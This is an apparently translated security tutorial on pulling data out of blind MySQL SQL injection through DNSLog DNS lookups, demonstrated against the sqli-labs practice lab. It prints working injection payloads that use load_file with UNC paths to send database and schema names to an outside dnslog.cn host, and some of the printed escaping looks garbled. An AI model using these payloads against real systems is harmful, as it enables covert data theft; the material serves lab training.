DNSLog Vulnerability Detection (7) SQL Injection Vulnerability Practice
In the previous article, we have learned about the use of DNSLog platform in XSS, RCE, XXE, and SSRF vulnerabilities. These vulnerabilities themselves parse URL addresses and initiate network requests when executed, so as long as we send the subdomain name address obtained by the DNSLog platform to the server with the vulnerability, DNSLog parsing records will be generated, which can prove that the The existence of vulnerabilities.
In this article, we will learn about the DNSLog platform and how to exploit SQL injection. The use of SQL injection in DNSLog is different from vulnerabilities such as XSS, RCE, XXE, and SSRF. When SQL injection has no echo, we can use the DNSLog platform Use it to bring out some database information
MySQL load_file function
In the MySQL database, the load_file function is a function used to read files. The following are SQL statements for reading corresponding files in each system.
#Windows系统
select load_file('C:/Windows/system.ini');
#Linux系统
select load_file('/etc/hosts');
If you want to read the corresponding file in the MySQL database, you need the following conditions:
- The file that needs to be read is in the database itself
- The user must have permission to access the file
- The size of the file to be read must be less than max_allowed_packet, otherwise NULL is returned.
The following are the size limits for max_allowed_packet in the current version of the database. The default size is generally 32MB.
secure_file_priv parameter
In addition to file reading operations, there are also file writing operations in the MySQL database. Reading and writing files in the MySQL database are restricted by the secure_file_priv parameter. There are three types of secure_file_priv parameters in the MySQL database. When secure-file-priv="", we can execute import and export commands on any file.
| value | type |
|---|---|
| secure-file-priv=“” | No restrictions (unsafe) |
| secure-file-priv=“Specific folder” | Can only import and export in specified folders |
| secure-file-priv=NULL | Import and export not allowed |
We can query the type of this parameter in the MySQL database using the following statement
show variables like '%secure_file_priv%';
DNSLog injection steps (MySQL for Windows only)
First, we open the DNSLog platform and click Get SubDomain to obtain a subdomain name. The subdomain address we obtained here is 9asrrv.dnslog.cn
Then replace the file that needs to be read with the subdomain name address obtained by the DNSLog platform. What needs to be noted here is that after escaping, it is \\, which is the format of the UNC path commonly used in Windows systems, and the following /test is required. Written, it represents the name of a folder in the UNC path. Of course, the name of the folder can be whatever you want. In short, the correct format is this. The meaning of the entire statement is to read a folder. We added the address of the DNSLog platform to the UNC path so that this statement can access our DNSLog platform when executed, thereby generating parsing records.
#原始的payload
select load_file('xxxxx.dnslog.cn/test');
#本文所使用的payload
select load_file('9asrrv.dnslog.cn/test');
Next we execute the corresponding statements
Now we return to the DNSLog platform and click Refresh Record to refresh. At this time, the DNSLog platform will generate DNSLog parsing records.
So this means that if we encounter a SQL injection vulnerability and there is no echo, we can splice such a statement at the submission point with SQL injection vulnerability parameters, whether it is a get or a post request, as long as the server executes this statement and generate DNSLog parsing on the DNSLog platform, it can prove that the vulnerability exists.
Next, we use the sqli-labs shooting range to make a demonstration. The sqli-labs shooting range used in the experiment is the fifth level of sqli-labs.
When our parameter id = 1 the page displays normally, but when we change the parameter to id = 1‘ the page generates an error
When we change the parameter to id = 1’ --+ the page displays normally
When we execute such a statement, we can determine that there is a SQL injection vulnerability, but it does not echo the relevant data to us. This is what we often call the SQL injection vulnerability without echo. For this In this situation, we usually use blind injection to solve the problem, but this article will teach you how to use the DNSLog platform to solve the problem of no echo of SQL injection vulnerabilities, and to bring out some information from the SQL database.
First, we open the DNSLog platform and click Get SubDomain to obtain a subdomain name. The subdomain name address we obtained here is 900ind.dnslog.cn
Then submit the following payload to the injection point where the SQL vulnerability exists
#原始的payload
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('','database()','.xxxxx.dnslog.cn/wuya'))),1,0) --+
#本文所使用的payload
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('////','database()','.900ind.dnslog.cn/wuya'))),1,0) --+
Now we return to the DNSLog platform and click Refresh Record to refresh. At this time, the DNSLog platform will generate DNSLog parsing records and display the library name of the current database.
If we want to query the library name of the second database, we can use the following statement to query
#原始的payload
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('',(select schema_name from information_schema.schemata limit 1,1),'.xxxxx.dnslog.cn/test'))),1,0) --+
#本文所使用的payload
http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 1,1),'.900ind.dnslog.cn/wuya'))),1,0) --+
Submit payload to injection point with SQL vulnerability
Now we return to the DNSLog platform and click Refresh Record to refresh. At this time, the DNSLog platform will generate DNSLog parsing records and bring out the library name of the second database.
In short, the idea of using the DNSLog platform to solve the problem of SQL injection without echo is such an idea. As for the relevant statements on how to use it, it is up to the masters to use it freely.